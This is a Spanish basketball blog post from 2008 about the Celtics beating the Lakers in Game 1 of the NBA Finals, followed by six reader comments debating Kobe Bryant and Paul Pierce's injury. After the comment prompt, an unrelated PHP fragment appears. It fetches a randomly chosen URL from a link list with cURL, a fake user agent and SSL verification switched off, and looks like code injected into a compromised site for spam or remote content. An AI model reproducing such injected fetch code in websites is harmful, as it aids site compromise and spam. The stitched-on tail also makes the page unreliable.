Regreso a “Hell” Garden (LAL 88 – BOS 98)

06 de June de 2008 por TheDeerHunter

Como en los viejos tiempos…

…ese pabellón oscuro con ese parquet característico que le da aspecto a viejo, ese ambiente peculiar, mágico, este año con humo de los cohetes antaño con el de los puros que se fumaba Auerbach, el “Beat L.A.” ensordecedor, más hostil que nadie contra todo lo que sea amarillo, el techo plagado de estandartes, títulos y camisetas con números legendarios. Ese lugar mítico donde hasta a Chamberlain le temblaron los pelos de la barba, la tumba de Jerry “Logo” West que únicamente Magic y Kareem supieron profanar.

Como si no hubieran pasado 21 años ya, anoche los Lakers volvieron a aquel lugar. Se trasladaron a aquellos tiempos y se encontraron con Russell, Bird, Cousy, Havlicek, Parish y McHale esperándoles como invisibles anfitriones. Todos con cara de pocos amigos… la que ponían siempre que recibían a los amarillos. Anoche eran otros los que vestían de verde pero los rostros eran iguales. Eran otros los que bramaban en la grada pero el ruido era el mismo. Parece imposible que haya llovido tanto y apenas nada ha cambiado. Qué increíble sensación de deja-vú y también de irrealidad. No es el juego en sí lo que transmite este tipo de emociones. Son las historias que se generan alrededor. Hazañas que rozan lo mitológico, lo místico, lo épico… Anoche fue la canción del Mío Cid en versión verde trébol la que se escribió en Boston y durante años será recitada en todas las plazas.

Fue en el momento justo cuando empezó todo. Al principio de la segunda parte los Lakers mantenían el control de la situación sin demasiadas dificultades a pesar de un primer tiempo no especialmente brillante, pero en ese momento Kobe estaba empezando a carburar y daba la sensación de que se estaba llevando el partido. Como si del mejor guión de suspense se tratara, tras otra genialidad de la estrella angelina, Perkins calló involuntariamente sobre la pierna de Paul Pierce, que caía fulminado y era trasladado en brazos directamente a la enfermería, con visibles gestos de dolor. Minutos después era el propio Perkins quien seguía ese camino con una evidente cojera.

En ese instante, todo parecía haber terminado para Celtics. Sin Pierce no son más que un frágil juguete en manos de Los Ángeles pero éstos vacilaron unos instantes tratando de asimilar esa nueva situación tan favorable para ellos. Mientras trataban de controlar la ansiedad de sentirse victoriosos, nada más que un par de minutos después de que hubiera abandonado la pista, Pierce volvió y los cimientos del Boston Garden se tambalearon por el estallido de júbilo de todos los que estaban presentes. Con un estrambótico vendaje en la pierna magullada, Pierce arengaba y con él arengaba Garnett, arengaba el video-marcador, arengaba hasta el vendedor de palomitas… Los Lakers no lo sabían todavía, pero ya habían perdido.

El cataclismo fue total. Empezando por Bryant, siguiendo por Odom&Gasol, Radmanovic, Farmar, Vujacic, Walton, Farmar, Turiaf y Bavetta. Todos sintieron lo que no olvidarán jamás: El influjo del duende verde. El caos se apoderó de todos que no acertaban a dar ni una a derechas. En defensa y en ataque recordaron a aquellos Spurs que se dejaron remontar 20 puntos en el primer partido de la final de conferencia. Cuando mejor lo tenían, se hundieron y no es casualidad que fuera así, porque estaban en el momento y en el lugar donde antes todos se han hundido.

Boston no tuvo que hacer un gran partido. Todo fue emoción y garra. No les hizo falta mucho más. La herida que les dejan en el alma a sus rivales es más importante que el juego que hicieron o el resultado. Exámen de carácter suspendido. El domingo la reválida.

Comenta

6 comentarios a esta entrada

  1. Gallis dice:
    #1

    Que pena, joder. Pocas veces vamos a tener una oportunidad tan buena de ganar en el Garden…pero por mucho que hablemos del equipo, este equipo vive y muere por Kobe…y ayer Kobe hizo un segundo tiempo desastroso.

    Pero bueno, no me quedo con tan malas sensaciones como podría pensarse. Creo que esto es lo que hay en Boston, no les veo capaces de jugar mucho mejor ni con mucha más carga emotiva, en cambio, el margen de mejora en LA es enoooooooormeeeeeee…dar en el segundo me parece importante, pero aún perdiendo, veo más factible una victoria amarilla en el regreso a Boston que una victoria verde en el Staples. Pero vaya, que son todo sensaciones.

      Citar

  2. TheDeerHunter dice:
    #2

    La duda que queda es… ¿hasta que punto lo de Pierce fue teatro?? ¿tanto como se dijo en el partido???

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Curioso sí que fue lo de Pierce, sin duda. Aparte el de la música tenía preparada de tananá, tananá, tanananá de Rocky, cosa que da que pensar.

    No quiero ni pensar lo que se diría si lo hubiera hecho eso Kobe.

    Nadie ha dicho nada, pero estuvo tremendo, aunque estuvo muy poco, Posey.

      Citar

  4. Viva_Dirk dice:
    #4

    Esto es a lo que me refería ayer. Los Lakers pierden con Kobe haciendo un mal partido y una 2ª parte horrible y se toma como si no hubiese pasado nada, si hace un partidazo y ganan, se dice cualquier cosa que uno se pueda imaginar.

    Pero bueno, lo importante es que se pudo ganar ayer y creo que tendremos oportunidades en todos los partidos que halla que jugar en Boston.

      Citar

  5. Gallis dice:
    #5

    Ya, Viva, claro…y cuando Kidd llegó a Dallas y no le ganaban a nadie, Nowitzki no tenía nada que ver, pero luego en vez de con una rodilla y media, parecía que ganaba jugando solo con un compañero, y solo para que alguien le pasara el balón…

    Lo que yo no termino de entender es dónde está la prohibición para que la gente no pueda decir más cosas sobre lo que hizo Pierce el otro día…pero seguro que los amarillos llorones prokobistas tenemos algo que ver, jejejeje 😛

      Citar

  6. TheDeerHunter dice:
    #6

    No termino de entender ese comentario acerca de Kobe… cuando lo hace mal se le critica como a todos, pero no es lo mismo hacerlo mal un día suelto que, como Radmanovic, hacerlo mal por sistema.
    No creo que se pueda hacer sangre de uno al que no le salen las cosas un día, pero ves que se deja la vida a pesar de todo.

    Obviamente Kobe es más responsable de los éxitos y de los fracasos por ser el líder del equipo… pero tampoco me parece normal cebarse con él por equivocarse en un partido (o en dos como así ha sido) cuando es él quien saca las castañas del equipo en el 99% del tiempo.

    En cualquier caso, opino que aquí nadie tiene la exclusividad de las ideas… y que si alguien considera que no se toca algún tema de alguna forma determinada él siempre puede expresar libremente su punto de vista para debatirlo. Yo desde luego no puedo dar ninguna opinión que no sea mía.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>